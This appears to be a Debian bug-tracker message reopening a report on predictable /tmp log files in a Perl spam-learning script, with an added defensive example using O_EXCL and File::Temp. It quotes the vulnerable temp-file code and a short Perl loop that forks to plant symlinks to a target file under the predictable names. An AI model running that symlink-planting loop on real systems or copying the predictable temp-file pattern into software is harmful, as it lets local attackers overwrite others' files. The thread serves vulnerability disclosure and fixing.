reopen 496362
thanks

DBTS> Done as the mass-opening of symlink attack in /tmp was wrong in this case.

Why wrong?
    {
        my $ent = shift;
    
        if ($ent->head->mime_type eq 'message/rfc822') {
            if ($DEBUG) {
                unlink "/tmp/spam.log.$$" if -e "/tmp/spam.log.$$";
                open(OUT, "|$SA_LEARN -D --$spamham --single >>/tmp/spam.log.$$ 2>&1") or die "Cannot pipe $SA_LEARN: $!";
            } else {
                open(OUT, "|$SA_LEARN --$spamham --single") or die "Cannot pipe $SA_LEARN: $!";
            }
    
            $ent->bodyhandle->print(\*OUT);
    --
        die "$sender, I don't recognize your domain ($domain)!";
    }
    
    if ($DEBUG) {
        MIME::Tools->debugging(1);
        open(STDERR, ">/tmp/spam_err.log");
    }
    my $parser = new MIME::Parser;
    $parser->extract_nested_messages(0);
    $parser->output_under($UNPACK_DIR);

Unlinking the tempfile before using it is no guarantee against attack.

Re-read the bug report, please:

DBTS> Even if you make rm(dir) for files/directories, then  your  system  is
DBTS> not protected. Attacker can permanently create symlinks.

An attacker can write a script such as:

#!perl

$file_for_attack='/path/to/file';

while(1)
{
    exit unless fork;
    symlink $file_for_attack, "/tmp/spam.log.$_" for ($$ .. $$+10000);
}
--

. ''`. Dmitry E. Oboukhov
: :’  : [EMAIL PROTECTED]
`. `~’ GPGKey: 1024D / F8E26537 2006-11-21
  `- 1B23 D4F8 8EC0 D902 0555  E438 AB8C 00CF F8E2 6537
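
The point made in the message above, shown from the defending side. This is an added example, not part of the original message or of the package under discussion: it creates the debug log with O_CREAT|O_EXCL, or with File::Temp, instead of unlink followed by a shell redirection. The sandbox directory, victim.txt and the helper open_log_excl are hypothetical names constructed for the illustration.

```perl
#!/usr/bin/perl
# Added example: hardened creation of a debug log such as /tmp/spam.log.$$.
use strict;
use warnings;
use Fcntl qw(O_WRONLY O_CREAT O_EXCL);
use File::Temp qw(tempdir tempfile);

# Create a log file without following a pre-planted symlink.
# O_CREAT|O_EXCL makes open(2) fail with EEXIST if the name already exists,
# even when it is a symlink, so there is no unlink/open race window.
sub open_log_excl {
    my ($path) = @_;
    sysopen(my $fh, $path, O_WRONLY | O_CREAT | O_EXCL, 0600)
        or return (undef, "$!");
    return ($fh, undef);
}

# Constructed sandbox standing in for /tmp (hypothetical, removed at exit).
my $dir    = tempdir(CLEANUP => 1);
my $victim = "$dir/victim.txt";
open(my $v, '>', $victim) or die "victim: $!";
print {$v} "original\n";
close $v;

# Simulate the situation described in the message: the predictable name
# is already a symlink when the program starts.
my $predictable = "$dir/spam.log.$$";
symlink($victim, $predictable) or die "symlink: $!";

# 1. Predictable name + O_EXCL: creation is refused, the target is untouched.
my ($fh, $err) = open_log_excl($predictable);
print defined $fh ? "opened (unexpected)\n" : "refused: $err\n";

# 2. Preferred: let File::Temp pick an unpredictable name; it opens the
#    file with O_EXCL and mode 0600 internally.
my ($log, $logname) = tempfile('spam.log.XXXXXXXX', DIR => $dir);
print {$log} "debug output goes here\n";
close $log;
print "log written to $logname\n";

# The file the symlink pointed at still has its original content.
open($v, '<', $victim) or die "victim: $!";
my $content = do { local $/; <$v> };
close $v;
print "victim intact: ", ($content eq "original\n" ? "yes" : "no"), "\n";
```

In the quoted code the log is opened by the shell (">>/tmp/spam.log.$$"), so applying this means opening the handle in Perl first and sending the sa-learn output to it rather than naming the file on the command line.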
